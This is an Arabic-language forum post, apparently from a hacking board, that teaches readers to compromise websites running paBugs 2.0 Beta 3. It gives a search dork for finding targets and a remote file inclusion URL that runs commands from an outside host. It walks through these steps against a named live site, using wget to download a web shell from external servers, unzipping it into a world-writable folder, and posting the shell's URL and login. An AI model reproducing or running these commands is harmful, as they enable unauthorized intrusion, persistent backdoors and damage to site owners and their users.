Members Login
Username 
 
Password 
    Remember Me  
Post Info TOPIC: اليوم جايب لكم ثغرة جديدة تبع command excution


سريه سفيان بن عوف الغامدي للجهاد الكتروني

Status: Offline
Posts: 632
Date:
اليوم جايب لكم ثغرة جديدة تبع command excution
Permalink   
 






السلام عليكم,,

اليوم جايب لكم ثغرة جديدة تبع command excution

الثغرة في مواقع الاعلان عن الثغرات اللي تسخدم هالنوع من النسخ paBugs 2.0 Beta 3

عالعموم بدخل بشرح الثغرة على طوول ما بطوول عليكم

كود البحث:
Powered by paBugs 2.0 Beta 3

اذهب الاي محرك بحث و اكتب الكود اللي فوق,,

كود الاستثمار يكون بعد رابط النسخة غالبا يكون بعد bugs :
class.mysql.php?path_to_bt_dir=http://members.lycos.co.uk/palroot/cmd.gif?&cmd=id


بيكوون التطبيق في هالشرح على الموقع التالي عشان توضح الفكرة معكم,,
http://gangwars.irc-news.net/bugs

مثلا نذهب لمحرك بحث الياهوو:
http://search.yahoo.com/

و اكتب الكود اللي سبق و ذكرته لكم هذا:
Powered by paBugs 2.0 Beta 3
و طبعا تقدر تطور و تلعب بالبحث دامك عرفت الثغرة انها في هالنوع المحدد paBugs 2.0 Beta 3

و من نتائج البحث اخترت موقعنا اللي قلنا بنطبق عليه,,




نذهب للموقع اللي اخترناه:




بنقووم الحين بالعمل على طول
اضف بعد رابط الموقع مثل موقع التطبيق http://gangwars.irc-news.net/bugs
كود الاستثمار اللي ذكرته في اعلى الموضوع,,:
class.mysql.php?path_to_bt_dir=http://members.lycos.co.uk/palroot/cmd.gif?&cmd=id

و الحين شوووف اللي يظهر لك




لحد هنا و اعتقد الثغرة جدا سهلة و هي مماثلة لاي ثغرة كوماند اكسيوشن مثل ثغرة المتواجدين اللي تم شرحها هنا من قبل,,

عالعمووم ما بترككم لحالكم,, بنكمل الشرح لحد ما نرفع شل على الموقع

تابع معي الاتي و اللي هو كله عملية لرفع الشيل,,

اول حاجة نستعرض الصلاحيات على المجلد اللي موجودين فيه الحين بالامر ls -al
و اعمل كليك يمين على الصفحة و شووف الصلاحيات و نحن اللي نبحث عنه هو مجلد يحمل
الصلاحية 777 يعني يكوون كذا ظاهر على يساره drwxrwxrwx
في موقع التطبيق مثل ما نلاحظ في المجلد الحالي مافي اي ملف يحمل الصلاحية drwxrwxrwx
عشاان كذا بنرجع خطوة للخلف في مسار الموقع و نشووف ملجدات ثانية,,




اول شي نشووف المسار اللي نحن عليه حاليا,, بالامر pwd بيظهر التالي:
/var/www/gangwars/bugs







طبعا نحن حاليا بــ bugs
بنرجع للخلف عن طريق الامر التالي:
cd /var/www/gangwars/;pwd
يعني بنرجع للمجلد gangwars






اوكي حلوو حاليا رجعنا للمجلد gangwars الحين نقووم بعرض الصلاحيات على الملفات الموجودة في هالمجلد بالامر اللي سبق و ذكرناه في خطوات سابقة ls -al

شي طيب ظهرت تقريبا اربع ملفات عليها الصلاحية drwxrwxrwx
وهي :
2004_graph
counter
online
warbots





بنختار اي ملف من هذوول و بننتقل له,,

انا مثلا اخترت الملف counter
و الحين بنتقل له و بقووم برفع الشيل تبعي عليه
بنتقل عن طريق الامر التالي لاحظ:
cd /var/www/gangwars/counter/;pwd

حلووو انا حاليا بالمجلد counter





كل اللي باقي هو رفع الشيل و فكه و خلصت السالفة

نقووم برفع الشيل عن طريق الامر التالي:
تقووم بمسح ;pwd االلي بالخطوة السابقة مباشرة ,,
و نضع هذا الامر التالي عنها:
;wget http://xp10.com/shell.zip;ls shell*
طبعا هذا مثال لا غيرر يعني مكان http://xp10.com/shell.zip رابط شيلك
و مكان shell اسم الشيل اللي وضعته,, و انتبه لهذا النجمة * تكون اخر شي مو بالاول

و في حالة التطبيق على موقعنا امري كان كذا:
;wget%20http://www.malfat.com/uploads/files12/flount1.zip;ls%20flount1*

و اذا ظهر لك اسم الشيل يعني تحمل الشيل بنجاح و الحمد لله

لاحظ الصوورة:





طييب تحمل الشيل و تبقت خطووة اخيرة و هي فك الضغط
نستخدم الامر التالي unzip shell's name.zip
shell'name بيكون هنا اسم الشيل

يعني في حالتنا بيكون كذا:
unzip flount1.php

و اذا ظهر لك التالي:
Archive: flount1.zip inflating: flount1.php
يعني تم فك ضغط الشيل بنجاح,,
طبعا الاسم بيتغير تبعا لاسم الشيل تبعك,,





و بيكوون رابط شيلنااا الان هو:
http://gangwars.irc-news.net/counter/flount1.php

و طبعااا تفضلووا الشيل:
user: xp10
pass: volcano&boob11




__________________
Page 1 of 1  sorted by
 Add/remove tags to this thread
Quick Reply

Please log in to post quick replies.

Tweet this page Post to Digg Post to Del.icio.us


Create your own FREE Forum
Report Abuse
Powered by ActiveBoard